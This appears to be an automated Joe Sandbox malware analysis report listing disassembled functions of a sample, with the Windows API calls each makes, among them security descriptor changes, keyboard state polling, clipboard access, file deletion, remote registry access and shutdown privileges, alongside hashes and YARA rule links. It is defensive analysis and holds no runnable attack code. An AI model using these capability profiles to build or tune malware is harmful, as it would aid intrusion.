                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3616455698-4108050209
                                                                                                                  • Opcode ID: 8848f25d6bebc1bb6110560aaa296adf24f40e351b510fe848d68cb5a8357ae6
                                                                                                                  • Instruction ID: 8395cd504d85744bf8d988ab10d054ec52f9eaee8a4b01c03d84776c9787d7cc
                                                                                                                  • Opcode Fuzzy Hash: 8848f25d6bebc1bb6110560aaa296adf24f40e351b510fe848d68cb5a8357ae6
                                                                                                                  • Instruction Fuzzy Hash: FD81AC70609311EFD710CF15E884A6BBBE8FB88718F04592EF995A7392D770D805CB62
                                                                                                                  Function 00E1A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E1ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E1ABD7
                                                                                                                    • Part of subcall function 00E1ABBB: GetLastError.KERNEL32(?,00E1A69F,?,?,?), ref: 00E1ABE1
                                                                                                                    • Part of subcall function 00E1ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00E1A69F,?,?,?), ref: 00E1ABF0
                                                                                                                    • Part of subcall function 00E1ABBB: RtlAllocateHeap.NTDLL(00000000,?,00E1A69F), ref: 00E1ABF7
                                                                                                                    • Part of subcall function 00E1ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E1AC0E
                                                                                                                    • Part of subcall function 00E1AC56: GetProcessHeap.KERNEL32(00000008,00E1A6B5,00000000,00000000,?,00E1A6B5,?), ref: 00E1AC62
                                                                                                                    • Part of subcall function 00E1AC56: RtlAllocateHeap.NTDLL(00000000,?,00E1A6B5), ref: 00E1AC69
                                                                                                                    • Part of subcall function 00E1AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E1A6B5,?), ref: 00E1AC7A
                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E1A6D0
                                                                                                                  • _memset.LIBCMT ref: 00E1A6E5
                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E1A704
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E1A715
                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00E1A752
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E1A76E
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E1A78B
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E1A79A
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E1A7A1
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E1A7C2
                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00E1A7C9
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E1A7FA
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E1A820
                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E1A834
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2347767575-0
                                                                                                                  • Opcode ID: 1961bcade300e397134969c578290e6ba478363297337efe378a4ae32a2ac684
                                                                                                                  • Instruction ID: d8e716a47abf17a6079ab842f0475c00399768a9c3ca5d5e1a54555c80cebae0
                                                                                                                  • Opcode Fuzzy Hash: 1961bcade300e397134969c578290e6ba478363297337efe378a4ae32a2ac684
                                                                                                                  • Instruction Fuzzy Hash: 3E515C71A01209AFDF049F91DC48EFEBBB9FF04314F08812AE811B6291D7749A46CB61
                                                                                                                  Function 00DE6F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$
                                                                                                                  • API String ID: 0-699356676
                                                                                                                  • Opcode ID: 7c4b18e1d358aa71e6dd7373808592546e49fdd9880c3f57992e932e60a11f13
                                                                                                                  • Instruction ID: eb580764977cb27007200badfe557e2b6e26d0ddb00677ccc4f4d55ddc0e0898
                                                                                                                  • Opcode Fuzzy Hash: 7c4b18e1d358aa71e6dd7373808592546e49fdd9880c3f57992e932e60a11f13
                                                                                                                  • Instruction Fuzzy Hash: BF72A171E042598BDF24DF99D8807AEB7B5FF48350F14916AE919FB280DB309E41DBA0
                                                                                                                  Function 00E263F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E25FA6,?), ref: 00E26ED8
                                                                                                                    • Part of subcall function 00E272CB: GetFileAttributesW.KERNEL32(?,00E26019), ref: 00E272CC
                                                                                                                  • _wcscat.LIBCMT ref: 00E26441
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E2645F
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E26474
                                                                                                                  • _wcscpy.LIBCMT ref: 00E264A3
                                                                                                                  • _wcscat.LIBCMT ref: 00E264B8
                                                                                                                  • _wcscat.LIBCMT ref: 00E264CA
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00E264DA
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E264EB
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E26506
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 2643075503-1173974218
                                                                                                                  • Opcode ID: 48c31f6a0a299ffae900a9dccae4b51e3fa93c502e9da96a6b8adbe05fdae995
                                                                                                                  • Instruction ID: e5172a6e0268b5f30fedecdd08701ae9f1a6b9fa4c775248889317716f3d7224
                                                                                                                  • Opcode Fuzzy Hash: 48c31f6a0a299ffae900a9dccae4b51e3fa93c502e9da96a6b8adbe05fdae995
                                                                                                                  • Instruction Fuzzy Hash: EE31A2B240C3889EC721EBA49C85ADBB7DCAF55304F401A1EF5D8D3141EA35D54D8767
                                                                                                                  Function 00E431BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E42BB5,?,?), ref: 00E43C1D
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4328E
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E4332D
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E433C5
                                                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E43604
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E43611
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1240663315-0
                                                                                                                  • Opcode ID: 0e5e516298acbcab8f9bccf932ccbe623b3d07131b7656ed5498ad50998910e5
                                                                                                                  • Instruction ID: cd8c6c8721a3e31f8d6d7ff4d073466f5947bcdaa8815aad0018d2bb3fc92ec5
                                                                                                                  • Opcode Fuzzy Hash: 0e5e516298acbcab8f9bccf932ccbe623b3d07131b7656ed5498ad50998910e5
                                                                                                                  • Instruction Fuzzy Hash: BAE16C35604210AFCB14EF29D995E6EBBE9EF88314F04846DF54AE72A1DB30ED05CB61
                                                                                                                  Function 00E22B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00E22B5F
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00E22BE0
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00E22BFB
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00E22C15
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00E22C2A
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00E22C42
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00E22C54
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00E22C6C
                                                                                                                  • GetKeyState.USER32(00000012), ref: 00E22C7E
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00E22C96
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00E22CA8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: 2de24191be84fc9996a0a4e45b6d042d599e5afa8468aa8a78f7af627d17ccc7
                                                                                                                  • Instruction ID: db74b7238437dc038faa9504458325d556c05ad06f3aa01556a8fca9672db1a8
                                                                                                                  • Opcode Fuzzy Hash: 2de24191be84fc9996a0a4e45b6d042d599e5afa8468aa8a78f7af627d17ccc7
                                                                                                                  • Instruction Fuzzy Hash: 8741D330A047D97DFF309B60A8053AAFEA06B11358F44A05DDBC6766C1DAA599C8C7A2
                                                                                                                  Function 00E36D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1737998785-0
                                                                                                                  • Opcode ID: 4120139f42fadbca888930751fbbece8986c6ae7c52199e2a75c59c9a10ae5d2
                                                                                                                  • Instruction ID: 82b55d002e6610c6c9d8bdeba0066cc1c1faaa31f2b68ed8a4104922165ebced
                                                                                                                  • Opcode Fuzzy Hash: 4120139f42fadbca888930751fbbece8986c6ae7c52199e2a75c59c9a10ae5d2
                                                                                                                  • Instruction Fuzzy Hash: 5E219F31704110AFDB11AF66EC59B6E7BE8EF48750F45C019F90AEB2A1CB70E904CBA0
                                                                                                                  Function 00E3C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E19ABF: CLSIDFromProgID.COMBASE ref: 00E19ADC
                                                                                                                    • Part of subcall function 00E19ABF: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00E19AF7
                                                                                                                    • Part of subcall function 00E19ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00E19B05
                                                                                                                    • Part of subcall function 00E19ABF: CoTaskMemFree.COMBASE(00000000), ref: 00E19B15
                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00E3C235
                                                                                                                  • _memset.LIBCMT ref: 00E3C242
                                                                                                                  • _memset.LIBCMT ref: 00E3C360
                                                                                                                  • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00E3C38C
                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 00E3C397
                                                                                                                  Strings
                                                                                                                  • NULL Pointer assignment, xrefs: 00E3C3E5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                  • Opcode ID: 418ffb03f1831fed0ec113fade94b876ae6cafac9c05d8a1124d863750e5d805
                                                                                                                  • Instruction ID: 3a0e3f0ff6f882f93f5fdc6f3f4c9ea40204a2658b7ec5982c2586c41c56cfe9
                                                                                                                  • Opcode Fuzzy Hash: 418ffb03f1831fed0ec113fade94b876ae6cafac9c05d8a1124d863750e5d805
                                                                                                                  • Instruction Fuzzy Hash: 6F915C71D00218ABDB10EF95DC85EEEBBB8EF08750F20915AF519B7281DB709A45CFA0
                                                                                                                  Function 00E50133 Relevance: 10.7, APIs: 7, Instructions: 245windownativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00E5016D
                                                                                                                  • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00E5038D
                                                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E503AB
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00E503D6
                                                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E503FF
                                                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 00E50421
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00E50440
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2922825909-0
                                                                                                                  • Opcode ID: 9059138297d633064f55b89c646ede8f0743410642fd253890c80a5590da8419
                                                                                                                  • Instruction ID: 22a8c59635850e17522f7cf5e9c422884d2dcf620328f385ad1bbfc2e4924097
                                                                                                                  • Opcode Fuzzy Hash: 9059138297d633064f55b89c646ede8f0743410642fd253890c80a5590da8419
                                                                                                                  • Instruction Fuzzy Hash: 91A1DC34600616EFDB18CF28C9897BEBBB1BF08746F089525FC54AB290D774AD58CB90
                                                                                                                  Function 00E4ECD4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                    • Part of subcall function 00DFB63C: GetCursorPos.USER32(000000FF), ref: 00DFB64F
                                                                                                                    • Part of subcall function 00DFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00DFB66C
                                                                                                                    • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000001), ref: 00DFB691
                                                                                                                    • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000002), ref: 00DFB69F
                                                                                                                  • ReleaseCapture.USER32 ref: 00E4ED48
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00E4EDF0
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E4EE03
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00E4EEDC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                  • API String ID: 973565025-2107944366
                                                                                                                  • Opcode ID: 5b24a12a3c7602d97062996eb8fc623be83db36b3057fdec7cce32b3ec202f29
                                                                                                                  • Instruction ID: 52661f2930f7c3a13d11e5aa4822c7584327443f00e1dcec876ee6b266058b7f
                                                                                                                  • Opcode Fuzzy Hash: 5b24a12a3c7602d97062996eb8fc623be83db36b3057fdec7cce32b3ec202f29
                                                                                                                  • Instruction Fuzzy Hash: 8B51AB70604304AFD710EF21EC96FAA77E4FF88714F04591DF995A62E1DB70A908CB62
                                                                                                                  Function 00E279D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E1B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E1B180
                                                                                                                    • Part of subcall function 00E1B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E1B1AD
                                                                                                                    • Part of subcall function 00E1B134: GetLastError.KERNEL32 ref: 00E1B1BA
                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00E27A0F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                  • Opcode ID: 46d483c2f8b7716fc363b943757c68e4d18274d072ec1be0ce0253f3912ddcdb
                                                                                                                  • Instruction ID: 5085287e82e26359ec8f8c1f217f2087c208c4288e19c8b33cff72b1157d5f44
                                                                                                                  • Opcode Fuzzy Hash: 46d483c2f8b7716fc363b943757c68e4d18274d072ec1be0ce0253f3912ddcdb
                                                                                                                  • Instruction Fuzzy Hash: B901A7B175D3726EF7285678BC5BBFF72589B047A4F152824FD83B20D2D9A09E4081A4
                                                                                                                  Function 00E38C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                  Download Yara Rule
